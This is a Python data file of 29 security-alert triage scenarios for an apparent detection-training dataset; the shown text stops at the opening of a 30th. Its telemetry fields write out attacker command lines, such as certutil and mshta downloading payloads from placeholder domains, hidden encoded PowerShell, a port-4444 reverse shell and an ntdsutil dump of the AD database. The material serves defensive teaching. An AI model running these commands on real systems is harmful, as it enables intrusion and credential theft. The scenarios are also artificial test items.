# -*- coding: utf-8 -*-
"""Specs Chunk 1: Domains 1 to 4 (TF-001 to TF-032) - 32 templates"""

CHUNK_1 = [
    # --- DOMAIN 1: PowerShell & Scripting (8) ---
    ("TF-001", "Admin SCCM Software Deployment", "powershell_scripting", "alert_triage", "benign", "train", None, "Windows", "server", "svc_sccm",
     "PowerShell Script Execution via SCCM Agent", "low", "PowerShell Script Execution",
     [("powershell_log", "PowerShell executed signed package install script Deploy-ClientUpdate.ps1", '{"script": "Deploy-ClientUpdate.ps1", "signer": "CN=Corp CA"}'),
      ("process_creation", "CcmExec.exe spawned powershell.exe with executionpolicy bypass", '{"cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\ccmcache\\\\Deploy-ClientUpdate.ps1"}')],
     [("Authorized SCCM management agent deployed signed package update script.", ["EVT-001", "EVT-002"], "low")],
     "Execution initiated by SCCM service account running cryptographically verified internal corporate script.", [],
     [("Close alert as authorized software deployment.", "low", "Expected configuration management activity.")], None),

    ("TF-002", "Developer Ad-Hoc Script Off-Hours", "powershell_scripting", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "workstation", "developer01",
     "Unsigned PowerShell Script Executed from User Temp", "medium", "Suspicious Script Path",
     [("powershell_log", "Unsigned script query_api_test.ps1 executed from C:\\Temp by developer01", '{"path": "C:\\\\Temp\\\\query_api_test.ps1"}'),
      ("network_connection", "powershell.exe connected to internal staging server 10.0.2.10:8080", '{"dest": "10.0.2.10:8080"}')],
     [("Developer executed unsigned script from temporary directory targeting internal staging host.", ["EVT-001", "EVT-002"], "medium")],
     "Execution path outside standard dev repositories warrants verification with developer to confirm testing scope.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"])],
     [("Contact developer01 to verify script authorization.", "medium", "Distinguish local test script from staging abuse.")],
     ["Script source code content from C:\\Temp\\query_api_test.ps1"]),

    ("TF-003", "Obfuscated PowerShell Download Cradle", "powershell_scripting", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee01",
     "Base64 Encoded PowerShell Download Cradle", "high", "PowerShell Obfuscated Download",
     [("process_creation", "cmd.exe spawned powershell.exe with -w hidden -enc parameters", '{"cmd": "powershell.exe -w hidden -enc {enc}"}'),
      ("dns_query", "DNS query for untrusted domain {domain}", '{"domain": "{domain}", "ip": "{ext_ip}"}'),
      ("network_connection", "powershell.exe established TCP connection to {ext_ip}:8443", '{"dest": "{ext_ip}:8443"}')],
     [("Encoded PowerShell command executed with hidden window flag.", ["EVT-001"], "high"),
      ("Outbound connection established to suspicious external destination {domain} ({ext_ip}).", ["EVT-002", "EVT-003"], "high")],
     "Combination of obfuscation, hidden window execution, and unapproved external network cradle indicates staging activity.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"]),
      ("T1027", "Obfuscated Files or Information", "Defense Evasion", ["EVT-001"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-002", "EVT-003"])],
     [("Isolate host {hostname} from corporate network.", "immediate", "Prevent payload staging."),
      ("Block IP {ext_ip} and domain {domain} at perimeter firewall.", "high", "Terminate external communication channel.")], None),

    ("TF-004", "Macro Document Spawning Encoded PowerShell C2", "powershell_scripting", "alert_triage", "confirmed_malicious", "train", None, "Windows", "workstation", "employee02",
     "WINWORD Spawning Obfuscated PowerShell Reverse Shell", "critical", "Office Spawning Shell",
     [("email", "Phishing email with attachment Quarterly_Bonus.docm delivered to {username}", '{"attachment": "Quarterly_Bonus.docm"}'),
      ("process_creation", "WINWORD.EXE spawned powershell.exe with encoded arguments", '{"cmd": "powershell.exe -nop -w hidden -enc {enc}"}'),
      ("dns_query", "DNS resolution for malicious dynamic DNS host {domain}", '{"domain": "{domain}", "resolved": "{ext_ip}"}'),
      ("network_connection", "Persistent TCP socket established to {ext_ip}:4444", '{"dest": "{ext_ip}:4444"}')],
     [("Spearphishing attachment executed macro code spawning child PowerShell process.", ["EVT-001", "EVT-002"], "high"),
      ("Active interactive command-and-control connection established to {ext_ip}:4444 ({domain}).", ["EVT-003", "EVT-004"], "critical")],
     "Full infection chain verified from phishing lure to Office macro execution and active external reverse shell connection.",
     [("T1566.001", "Spearphishing Attachment", "Initial Access", ["EVT-001"]),
      ("T1059.001", "PowerShell", "Execution", ["EVT-002"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-003", "EVT-004"])],
     [("Immediately isolate host {hostname} and terminate process tree.", "immediate", "Stop active interactive adversary access."),
      ("Purge email Quarterly_Bonus.docm from all recipient mailboxes.", "immediate", "Prevent lateral infection.")], None),

    ("TF-005", "Truncated PowerShell Telemetry", "powershell_scripting", "alert_triage", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "employee05",
     "PowerShell Command Line Exceeding Log Buffer", "medium", "Truncated Process Telemetry",
     [("process_creation", "powershell.exe invoked with truncated command line 'powershell.exe -NoExit -Command ... [TRUNCATED]'", '{"truncated": true}'),
      ("authentication", "Active standard user session for {username}", '{"user": "{username}"}')],
     [("Process creation telemetry truncated before script parameters could be inspected.", ["EVT-001", "EVT-002"], "medium")],
     "Critical arguments truncated by logging pipeline; impossible to determine benign admin script vs malicious payload without complete script block logs.", [],
     [("Collect PowerShell Event ID 4104 script block logs from host.", "high", "Retrieve complete command text.")],
     ["PowerShell Operational Event Log 4104", "Endpoint network connection records"]),

    ("TF-006", "Scheduled Disk Space Maintenance", "powershell_scripting", "evidence_analysis", "benign", "train", None, "Windows", "server", "SYSTEM",
     "Routine Temp Cleanup Script Executed by SYSTEM", "informational", "Maintenance Activity",
     [("scheduled_task", "Scheduled Task 'WeeklyTempCleanup' triggered on schedule", '{"task": "WeeklyTempCleanup"}'),
      ("file_modification", "powershell.exe deleted 142 expired log files from C:\\Windows\\Temp", '{"deleted": 142}')],
     [("Built-in scheduled task performed routine temporary file cleanup.", ["EVT-001", "EVT-002"], "informational")],
     "Expected automated maintenance action executed by SYSTEM account according to documented schedule.", [],
     [("No action required. Routine maintenance.", "low", "Standard operational telemetry.")], None),

    ("TF-007", "PowerShell Memory Patching AMSI Bypass", "powershell_scripting", "alert_triage", "likely_malicious", "val", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee10",
     "In-Memory AMSI Bypass Pattern Detected in PowerShell", "high", "AMSI Bypass",
     [("powershell_log", "PowerShell script invoked WriteProcessMemory targeting amsi.dll!AmsiScanBuffer", '{"dll": "amsi.dll"}'),
      ("process_creation", "powershell.exe executed with -NoProfile -ExecutionPolicy Bypass", '{"cmd": "powershell.exe -nop -ep bypass"}')],
     [("PowerShell process attempted to patch AmsiScanBuffer memory region to blind EDR detection.", ["EVT-001", "EVT-002"], "high")],
     "Patching AMSI memory is a dedicated defense evasion technique characteristic of post-exploitation toolkits.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-002"]),
      ("T1027", "Obfuscated Files or Information", "Defense Evasion", ["EVT-001"])],
     [("Terminate PowerShell PID on {hostname} and isolate host.", "immediate", "Prevent evasion of script scanning.")], None),

    ("TF-008", "PowerShell Browser History Exfiltration", "powershell_scripting", "response_recommendation", "confirmed_malicious", "test", None, "Windows", "workstation", "contractor01",
     "PowerShell Staging and Exfiltrating Browser History", "critical", "Data Exfiltration",
     [("file_modification", "powershell.exe copied Chrome and Edge History files to C:\\Users\\Public\\staging.zip", '{"dest": "C:\\\\Users\\\\Public\\\\staging.zip"}'),
      ("network_connection", "powershell.exe uploaded 4.2 MB over TLS to {ext_ip}:443", '{"dest": "{ext_ip}:443", "bytes": 4404019}'),
      ("file_modification", "C:\\Users\\Public\\staging.zip securely deleted via powershell", '{"deleted": "C:\\\\Users\\\\Public\\\\staging.zip"}')],
     [("Adversary staged local browser credential databases into encrypted archive.", ["EVT-001"], "high"),
      ("Data exfiltrated to external host {ext_ip} followed by artifact wiping.", ["EVT-002", "EVT-003"], "critical")],
     "Explicit sequence of credential harvesting, compression, external exfiltration, and anti-forensic cleanup.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"]),
      ("T1567.002", "Exfiltration to Cloud Storage", "Exfiltration", ["EVT-002"])],
     [("Immediately disconnect {hostname} from network and revoke all user sessions.", "immediate", "Prevent further token abuse."),
      ("Initiate enterprise-wide credential rotation for user {username}.", "immediate", "Compromised browser passwords.")], None),

    # --- DOMAIN 2: Living-off-the-Land (LotL) (8) ---
    ("TF-009", "Certutil Certificate Hash Verification", "lotl_tools", "alert_triage", "benign", "train", None, "Windows", "workstation", "it_admin01",
     "Certutil Executed for SHA256 Verification", "informational", "Certutil Hash Verification",
     [("process_creation", "certutil.exe executed with -hashfile argument on internal deployment MSI", '{"cmd": "certutil.exe -hashfile C:\\\\Installs\\\\agent_v2.msi SHA256"}'),
      ("authentication", "Interactive administrative session for it_admin01", '{"user": "it_admin01", "logon_type": 2}')],
     [("Administrator utilized certutil to verify digital hash of deployment artifact.", ["EVT-001", "EVT-002"], "informational")],
     "Standard administrative practice of computing cryptographic file integrity hashes.", [],
     [("Close alert as benign administrative hash verification.", "low", "Documented IT operations process.")], None),

    ("TF-010", "Certutil File Download from Internal IP", "lotl_tools", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "workstation", "employee01",
     "Certutil Download from Staging Server", "medium", "Certutil Network Transfer",
     [("process_creation", "certutil.exe executed with -urlcache -split -f targeting internal host 10.0.2.25", '{"cmd": "certutil.exe -urlcache -split -f http://10.0.2.25:8080/patch.exe C:\\\\Temp\\\\patch.exe"}'),
      ("network_connection", "certutil.exe established HTTP connection to internal staging IP 10.0.2.25:8080", '{"dest": "10.0.2.25:8080"}')],
     [("Certutil utilized to fetch executable from internal staging address rather than official software repository.", ["EVT-001", "EVT-002"], "medium")],
     "Use of certutil for network file retrieval is an unexpected ingress method on standard workstations.",
     [("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-001", "EVT-002"])],
     [("Contact host owner to verify origin of patch.exe download.", "medium", "Ensure internal testing does not mask unauthorized tool staging.")], None),

    ("TF-011", "Certutil Ingress Payload Download from Untrusted Domain", "lotl_tools", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee05",
     "Certutil Ingress Transfer from Dynamic Domain", "high", "Certutil Malicious Download",
     [("process_creation", "cmd.exe spawned certutil.exe with -urlcache -split -f to external domain {domain}", '{"cmd": "certutil.exe -urlcache -split -f http://{domain}/stage2.dll C:\\\\Users\\\\Public\\\\stage2.dll"}'),
      ("dns_query", "DNS resolution for suspicious external domain {domain}", '{"domain": "{domain}", "resolved": "{ext_ip}"}'),
      ("file_modification", "New DLL stage2.dll created in C:\\Users\\Public", '{"path": "C:\\\\Users\\\\Public\\\\stage2.dll"}')],
     [("Living-off-the-land binary certutil abused to bypass web proxies and download binary from untrusted external domain.", ["EVT-001", "EVT-002", "EVT-003"], "high")],
     "Certutil ingress transfer from untrusted domain to Public folder is a high-fidelity living-off-the-land attack pattern.",
     [("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-001", "EVT-002"]),
      ("T1027", "Obfuscated Files or Information", "Defense Evasion", ["EVT-003"])],
     [("Quarantine file C:\\Users\\Public\\stage2.dll and isolate endpoint.", "immediate", "Prevent secondary stage execution.")], None),

    ("TF-012", "Certutil Process Logged without Command Line Arguments", "lotl_tools", "alert_triage", "insufficient_evidence", "train", "likely_malicious_vs_insufficient_evidence", "Windows", "workstation", "intern01",
     "Certutil Execution Missing Process Arguments", "medium", "Process Parameter Failure",
     [("process_creation", "certutil.exe process spawned by cmd.exe with null argument string in event log", '{"process": "certutil.exe", "arguments": null}'),
      ("file_modification", "Temporary cache file created in Local\\Temp", '{"path": "AppData\\\\Local\\\\Temp\\\\tmp812.tmp"}')],
     [("Certutil spawned from command shell but audit log failed to record command line switches.", ["EVT-001", "EVT-002"], "medium")],
     "Cannot differentiate between certificate verification and file download without command line parameters.", [],
     [("Inspect memory dump or prefetch artifact for certutil.exe to recover arguments.", "high", "Retrieve missing switches.")],
     ["Windows Prefetch file CERTUTIL.EXE-*.pf", "EDR memory inspection logs"]),

    ("TF-013", "Rundll32 Shell32 Control Panel Applet", "lotl_tools", "evidence_analysis", "benign", "train", None, "Windows", "workstation", "employee01",
     "Rundll32 Invoking Standard Control Panel Applet", "informational", "Standard Control Panel Execution",
     [("process_creation", "rundll32.exe executed shell32.dll,Control_RunDLL desk.cpl for display settings", '{"cmd": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"}'),
      ("authentication", "User employee01 active interactive console session", '{"user": "employee01", "logon_type": 2}')],
     [("Standard Windows user interface launched display properties control panel.", ["EVT-001", "EVT-002"], "informational")],
     "Known benign operating system behavior triggered by user changing display properties.", [],
     [("Close alert as normal user operating system behavior.", "low", "Standard desktop activity.")], None),

    ("TF-014", "Rundll32 Execution of Unsigned DLL from User Profile", "lotl_tools", "alert_triage", "likely_malicious", "train", None, "Windows", "workstation", "employee02",
     "Rundll32 Executing Binary from AppData", "high", "Rundll32 Unsigned Execution",
     [("file_modification", "Unsigned binary sqlite_cache.dll written to C:\\Users\\employee02\\AppData\\Local\\Temp", '{"file": "sqlite_cache.dll"}'),
      ("process_creation", "rundll32.exe executed export DllRegisterServer in sqlite_cache.dll", '{"cmd": "rundll32.exe C:\\\\Users\\\\employee02\\\\AppData\\\\Local\\\\Temp\\\\sqlite_cache.dll,DllRegisterServer"}'),
      ("network_connection", "rundll32.exe initiated outbound TCP socket to {ext_ip}:443", '{"dest": "{ext_ip}:443"}')],
     [("Unsigned DLL loaded from temporary directory via rundll32 proxy execution.", ["EVT-001", "EVT-002"], "high"),
      ("Rundll32 established external network socket to untrusted IP {ext_ip}.", ["EVT-003"], "high")],
     "Proxy execution of unsigned library from user writeable directory establishing external connection matches malware loader behavior.",
     [("T1204.002", "Malicious File", "Execution", ["EVT-001", "EVT-002"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-003"])],
     [("Terminate rundll32 process and quarantine sqlite_cache.dll.", "immediate", "Stop active DLL execution.")], None),

    ("TF-015", "Mshta Executing Remote Malicious HTA", "lotl_tools", "alert_triage", "confirmed_malicious", "train", None, "Windows", "workstation", "accountant01",
     "Mshta Remote HTML Application Execution", "critical", "Mshta Ingress Execution",
     [("email", "Spearphishing email with link delivered to {username}", '{"link": "http://{domain}/invoice.hta"}'),
      ("process_creation", "mshta.exe executed remote URL directly from command line", '{"cmd": "mshta.exe http://{domain}/invoice.hta"}'),
      ("network_connection", "mshta.exe fetched payload from external host {ext_ip}:80", '{"dest": "{ext_ip}:80"}'),
      ("process_creation", "mshta.exe spawned powershell.exe with encoded payload", '{"cmd": "powershell.exe -enc {enc}"}')],
     [("Remote HTML application loaded directly into memory using mshta.exe.", ["EVT-001", "EVT-002", "EVT-003"], "high"),
      ("Mshta process spawned secondary obfuscated PowerShell interpreter.", ["EVT-004"], "critical")],
     "Confirmed living-off-the-land initial access chain executing script directly from untrusted external URL.",
     [("T1566.002", "Spearphishing Link", "Initial Access", ["EVT-001"]),
      ("T1204.002", "Malicious File", "Execution", ["EVT-002", "EVT-003"]),
      ("T1059.001", "PowerShell", "Execution", ["EVT-004"])],
     [("Isolate endpoint {hostname} and kill mshta/powershell process trees.", "immediate", "Prevent further stage downloads.")], None),

    ("TF-016", "Bitsadmin Background Download Job by IT Updater", "lotl_tools", "alert_triage", "suspicious", "test", "benign_vs_suspicious", "Windows", "workstation", "contractor01",
     "Bitsadmin Job Created for File Transfer", "low", "Bitsadmin Transfer",
     [("process_creation", "bitsadmin.exe created download job 'CorporateSyncJob'", '{"cmd": "bitsadmin.exe /create CorporateSyncJob"}'),
      ("network_connection", "bitsadmin transferred file from internal server 10.0.1.15:443", '{"dest": "10.0.1.15:443"}')],
     [("Bitsadmin background transfer mechanism invoked to download internal asset.", ["EVT-001", "EVT-002"], "low")],
     "Bitsadmin is an archaic utility often used for stealthy persistence, though target IP is internal corporate asset.",
     [("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-001", "EVT-002"])],
     [("Verify with IT service desk if CorporateSyncJob is an authorized legacy script.", "low", "Verify transfer legitimacy.")], None),

    # --- DOMAIN 3: Authentication & Identity (8) ---
    ("TF-017", "Single User Password Mistype Followed by Success", "authentication_identity", "alert_triage", "benign", "train", None, "Windows", "workstation", "employee01",
     "Logon Failure Burst Followed by Successful Interactive Authentication", "low", "Logon Failure Followed by Success",
     [("authentication", "Failed logon attempt 4625 for employee01 with STATUS_WRONG_PASSWORD", '{"event_id": 4625, "user": "employee01", "status": "0xC000006A"}'),
      ("authentication", "Successful interactive logon 4624 for employee01 from console", '{"event_id": 4624, "user": "employee01", "logon_type": 2}')],
     [("User mistyped password once before successfully authenticating interactively.", ["EVT-001", "EVT-002"], "low")],
     "Normal human error pattern: single failure followed immediately by successful interactive logon from console.", [],
     [("Close alert as benign user password mistype.", "low", "Standard user authentication behavior.")], None),

    ("TF-018", "Multiple Failed Logins Across Departments", "authentication_identity", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "server", "admin01",
     "Multiple Authentication Failures Targeting Multiple Users", "medium", "Authentication Anomaly",
     [("authentication", "8 failed logon attempts across 3 user accounts within 4 minutes", '{"failed_count": 8, "accounts": ["admin01", "admin02", "it_admin01"]}'),
      ("authentication", "Logons originated from internal workstation 10.0.1.42", '{"source_ip": "10.0.1.42"}')],
     [("Sequential failed logons detected against multiple administrative accounts from internal host.", ["EVT-001", "EVT-002"], "medium")],
     "Targeted failure pattern could indicate local brute force testing or an administrator testing credentials.",
     [("T1110.001", "Password Guessing", "Credential Access", ["EVT-001", "EVT-002"])],
     [("Contact workstation user 10.0.1.42 to identify source of administrative authentication attempts.", "medium", "Clarify operational intent.")], None),

    ("TF-019", "Password Spray Against 40 Accounts with Single Success", "authentication_identity", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "server", "it_admin02",
     "Password Spraying Attack Originating from Single External Source", "high", "Password Spraying Detection",
     [("authentication", "Failed logon attempts targeting 40 distinct user accounts from single external IP {ext_ip}", '{"source_ip": "{ext_ip}", "targeted_users": 40}'),
      ("authentication", "Successful authentication achieved for account it_admin02 from {ext_ip}", '{"source_ip": "{ext_ip}", "user": "it_admin02", "logon_type": 3}')],
     [("Distributed spraying pattern against 40 accounts culminated in successful logon to it_admin02.", ["EVT-001", "EVT-002"], "high")],
     "Sequential failure pattern using common passwords matches MITRE ATT&CK password spray methodology.",
     [("T1110.003", "Password Spraying", "Credential Access", ["EVT-001"]),
      ("T1078.002", "Domain Accounts", "Defense Evasion", ["EVT-002"])],
     [("Immediately revoke active sessions and reset credentials for user it_admin02.", "immediate", "Mitigate account takeover."),
      ("Block external IP {ext_ip} at edge firewall.", "high", "Halt ongoing spray attack.")], None),

    ("TF-020", "Service Account Interactive RDP Logon", "authentication_identity", "response_recommendation", "confirmed_malicious", "train", None, "Windows", "server", "svc_deploy",
     "Interactive RDP Session Initiated by Service Account", "critical", "Service Account Abuse",
     [("authentication", "Service account svc_deploy initiated interactive RDP session to DC", '{"user": "svc_deploy", "logon_type": 10}'),
      ("process_creation", "cmd.exe spawned by svc_deploy executed whoami /priv and net localgroup administrators", '{"cmd": "cmd.exe /c whoami /priv & net localgroup administrators"}'),
      ("network_connection", "Inbound RDP TCP socket established from compromised endpoint 10.0.1.77", '{"source_ip": "10.0.1.77", "dest_port": 3389}')],
     [("Service account svc_deploy abused to establish interactive graphical session.", ["EVT-001", "EVT-003"], "high"),
      ("Privilege discovery commands executed immediately upon logon.", ["EVT-002"], "critical")],
     "Service accounts are strictly non-interactive; RDP logon accompanied by privilege enumeration confirms active intrusion.",
     [("T1078.002", "Domain Accounts", "Defense Evasion", ["EVT-001"]),
      ("T1021.001", "Remote Desktop Protocol", "Lateral Movement", ["EVT-003"]),
      ("T1087.002", "Domain Account Discovery", "Discovery", ["EVT-002"])],
     [("Terminate RDP session and disable service account svc_deploy immediately.", "immediate", "Eject intruder."),
      ("Isolate source pivot host 10.0.1.77.", "immediate", "Contain lateral pivot.")], None),

    ("TF-021", "Account Lockout Burst with Missing Source IP", "authentication_identity", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "server", "employee01",
     "Account Lockout Threshold Exceeded with Incomplete Network Log", "low", "Account Lockout Anomaly",
     [("authentication", "Account employee01 locked out following 5 rapid failed attempts", '{"user": "employee01", "lockout": true}'),
      ("authentication", "DC security event 4740 recorded caller machine name as blank/unresolved", '{"caller_computer": "", "event_id": 4740}')],
     [("User account locked out due to failed attempts but caller workstation missing from domain log.", ["EVT-001", "EVT-002"], "low")],
     "Without caller workstation or source IP, impossible to determine if cause is cached mobile credentials or network spray.", [],
     [("Query NTLM operational logs and Kerberos traffic to locate originating client IP.", "medium", "Trace lockout caller.")],
     ["Domain Controller NTLM Operational Log", "Radius / VPN authentication logs"]),

    ("TF-022", "Kerberos TGS Request by Authorized Exchange Server", "authentication_identity", "alert_triage", "benign", "train", None, "Windows", "server", "SRV-EXCHANGE-01$",
     "High Volume Kerberos Ticket Requests by Exchange Server", "low", "Kerberos Traffic Volume",
     [("authentication", "Computer account SRV-EXCHANGE-01$ requested 80 TGS tickets for mail routing", '{"client": "SRV-EXCHANGE-01$", "ticket_type": "TGS"}'),
      ("network_connection", "SRV-EXCHANGE-01$ communicating with Domain Controller port 88", '{"dest_ip": "10.0.1.15", "port": 88}')],
     [("Exchange messaging server requested standard Kerberos service tickets for legitimate mail transport.", ["EVT-001", "EVT-002"], "low")],
     "Normal high-throughput enterprise messaging operations involving service ticket negotiation.", [],
     [("Close alert as expected Exchange service ticket negotiation.", "low", "Standard directory traffic.")], None),

    ("TF-023", "Kerberoasting SPN Ticket Request Anomaly", "authentication_identity", "mitre_mapping", "likely_malicious", "train", None, "Windows", "workstation", "employee10",
     "Anomalous Volume of RC4 Kerberos TGS Requests (Kerberoasting)", "high", "Kerberoasting Activity",
     [("authentication", "User employee10 requested 28 Kerberos service tickets for high-value SPNs using weak RC4 cipher", '{"cipher": "0x17 (RC4-HMAC)", "spn_count": 28}'),
      ("process_creation", "powershell.exe executed PowerView Get-DomainUser query prior to ticket request", '{"cmd": "powershell.exe -c Get-DomainUser -SPN"}')],
     [("Reconnaissance query for Service Principal Names immediately followed by batch RC4 ticket requests.", ["EVT-001", "EVT-002"], "high")],
     "Classic Kerberoasting attack pattern requesting crackable RC4 ticket hashes for offline password recovery.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001"]),
      ("T1087.002", "Domain Account Discovery", "Discovery", ["EVT-002"])],
     [("Reset passwords for all 28 targeted service accounts and force AES encryption.", "high", "Neutralize offline cracking attempts."),
      ("Audit user account employee10 for prior credential compromise.", "high", "Identify initial compromise vector.")], None),

    ("TF-024", "Compromised Domain Admin Credential Abuse", "authentication_identity", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "admin02",
     "Domain Admin Account Authentication from Unmanaged Pivot", "critical", "Privileged Account Abuse",
     [("authentication", "Domain Admin admin02 logged onto Domain Controller from unmanaged IP 10.0.3.5 at 02:15 AM", '{"user": "admin02", "source_ip": "10.0.3.5", "logon_time": "02:15:00Z"}'),
      ("process_creation", "ntdsutil.exe executed to generate database snapshot", '{"cmd": "ntdsutil.exe ifm create full C:\\\\Temp\\\\ifm"}'),
      ("file_modification", "ntds.dit and SYSTEM registry hive created in C:\\Temp\\ifm", '{"files": ["ntds.dit", "SYSTEM"]}')],
     [("Domain administrator credentials utilized off-hours from unauthorized unmanaged IP.", ["EVT-001"], "high"),
      ("Attacker created Active Directory database snapshot using ntdsutil.", ["EVT-002", "EVT-003"], "critical")],
     "Full compromise of identity tier confirmed via unauthorized domain database extraction.",
     [("T1078.002", "Domain Accounts", "Defense Evasion", ["EVT-001"]),
      ("T1003.003", "NTDS", "Credential Access", ["EVT-002", "EVT-003"])],
     [("Initiate enterprise incident response plan: reset krbtgt account password twice.", "immediate", "Invalidate Kerberos golden tickets."),
      ("Isolate compromised pivot host 10.0.3.5 and disconnect domain controller network interfaces.", "immediate", "Halt active data theft.")], None),

    # --- DOMAIN 4: Persistence Mechanisms (8) ---
    ("TF-025", "Registry Run Key Created for Authorized Software", "persistence_mechanisms", "evidence_analysis", "benign", "train", None, "Windows", "workstation", "employee01",
     "Registry Run Key Created for Zoom Meetings", "low", "Persistence Registry Modification",
     [("registry_modification", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run entry added for Zoom.exe", '{"key": "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run", "value": "Zoom", "data": "C:\\\\Program Files\\\\Zoom\\\\bin\\\\Zoom.exe -autorun"}'),
      ("process_creation", "ZoomInstaller.exe spawned during user software update", '{"parent": "explorer.exe", "process": "ZoomInstaller.exe"}')],
     [("Authorized desktop collaboration software added legitimate auto-start registry key.", ["EVT-001", "EVT-002"], "low")],
     "Expected application persistence added during verified corporate collaboration tool installation.", [],
     [("Close alert as benign authorized application auto-start registration.", "low", "Standard software behavior.")], None),

    ("TF-026", "Suspicious Registry Run Key Pointing to VBScript", "persistence_mechanisms", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee05",
     "Registry Run Key Directing to VBScript in User Profile", "high", "Script Auto-Start Persistence",
     [("registry_modification", "HKCU\\...\\Run key 'WindowsUpdateHelper' created pointing to update.vbs", '{"value_name": "WindowsUpdateHelper", "target": "wscript.exe C:\\\\Users\\\\employee05\\\\AppData\\\\Roaming\\\\update.vbs"}'),
      ("file_modification", "Obfuscated script update.vbs written to Roaming directory", '{"path": "AppData\\\\Roaming\\\\update.vbs"}')],
     [("Masqueraded registry persistence key established pointing to script in writeable user directory.", ["EVT-001", "EVT-002"], "high")],
     "Use of deceptive key name and VBScript located in AppData is a classic userland persistence technique.",
     [("T1547.001", "Registry Run Keys", "Persistence", ["EVT-001"]),
      ("T1059.005", "Visual Basic", "Execution", ["EVT-001", "EVT-002"]),
      ("T1036.005", "Match Legitimate Name or Location", "Defense Evasion", ["EVT-001"])],
     [("Delete registry key 'WindowsUpdateHelper' and quarantine update.vbs.", "immediate", "Remove persistence mechanism.")], None),

    ("TF-027", "Scheduled Task Created by Local Admin for Python Script", "persistence_mechanisms", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "workstation", "it_admin01",
     "Scheduled Task Registered Executing Python Script", "medium", "Scheduled Task Creation",
     [("scheduled_task", "Scheduled task 'SyncDataJob' registered via schtasks.exe to run hourly", '{"task_name": "SyncDataJob", "action": "python.exe C:\\\\Scripts\\\\sync_metrics.py"}'),
      ("process_creation", "schtasks.exe invoked by interactive admin session it_admin01", '{"cmd": "schtasks.exe /create /tn SyncDataJob /tr python.exe /sc hourly"}')],
     [("New scheduled task created to execute local Python automation script.", ["EVT-001", "EVT-002"], "medium")],
     "Creation of scheduled tasks on endpoints outside formal deployment pipelines warrants operational review.",
     [("T1053.005", "Scheduled Task", "Persistence", ["EVT-001"]),
      ("T1059.006", "Python", "Execution", ["EVT-001"])],
     [("Review script C:\\Scripts\\sync_metrics.py to verify business necessity.", "medium", "Audit administrative script.")], None),

    ("TF-028", "Malicious Windows Service Installation via Sc.exe", "persistence_mechanisms", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "admin01",
     "Unauthorized Windows Service Created via Sc.exe", "critical", "Service Persistence",
     [("service_creation", "New service 'WinSecuritySvc' created pointing to binary in C:\\Temp", '{"service_name": "WinSecuritySvc", "binpath": "C:\\\\Temp\\\\srvc_agent.exe"}'),
      ("process_creation", "sc.exe create WinSecuritySvc binPath= C:\\Temp\\srvc_agent.exe start= auto", '{"cmd": "sc.exe create WinSecuritySvc binPath= C:\\\\Temp\\\\srvc_agent.exe start= auto"}'),
      ("network_connection", "srvc_agent.exe connected to external C2 {ext_ip}:443", '{"dest_ip": "{ext_ip}", "port": 443}')],
     [("Adversary registered persistent Windows service with auto-start pointing to staging folder.", ["EVT-001", "EVT-002"], "high"),
      ("Service binary spawned and connected immediately to external command-and-control host.", ["EVT-003"], "critical")],
     "Complete persistence lifecycle confirmed: service registration, automated start, and outbound C2 check-in.",
     [("T1543.003", "Windows Service", "Persistence", ["EVT-001"]),
      ("T1569.002", "Service Execution", "Execution", ["EVT-002"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-003"])],
     [("Stop and delete service 'WinSecuritySvc' and quarantine C:\\Temp\\srvc_agent.exe.", "immediate", "Eradicate service persistence."),
      ("Isolate server {hostname} from internal production subnet.", "immediate", "Contain server breach.")], None),

    ("TF-029", "Service Creation Event Missing Binary Path", "persistence_mechanisms", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "server", "SYSTEM",
     "Event ID 7045 Logged with Null Service ImagePath", "medium", "Incomplete Service Log",
     [("service_creation", "Windows Event ID 7045 recorded service creation for 'AppUpdateSvc' with null ImagePath", '{"event_id": 7045, "service_name": "AppUpdateSvc", "image_path": null}'),
      ("authentication", "Administrative session active for admin02 during timestamp window", '{"user": "admin02"}')],
     [("Service installation recorded in system event log but binary file path was omitted or corrupted.", ["EVT-001", "EVT-002"], "medium")],
     "Missing binary path in Event 7045 prevents distinguishing legitimate software install from rootkit service registration.", [],
     [("Inspect HKLM\\System\\CurrentControlSet\\Services\\AppUpdateSvc registry key directly on host.", "high", "Recover missing ImagePath.")],
     ["Registry Hive HKLM\\SYSTEM", "Full System Event Log 7045 dump"]),

    ("TF-030", "Linux Systemd Unit Modified by Sudo User", "persistence_mechanisms", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "server", "devops",
     "Systemd Service File Created in /etc/systemd/system/", "medium", "Systemd Persistence",
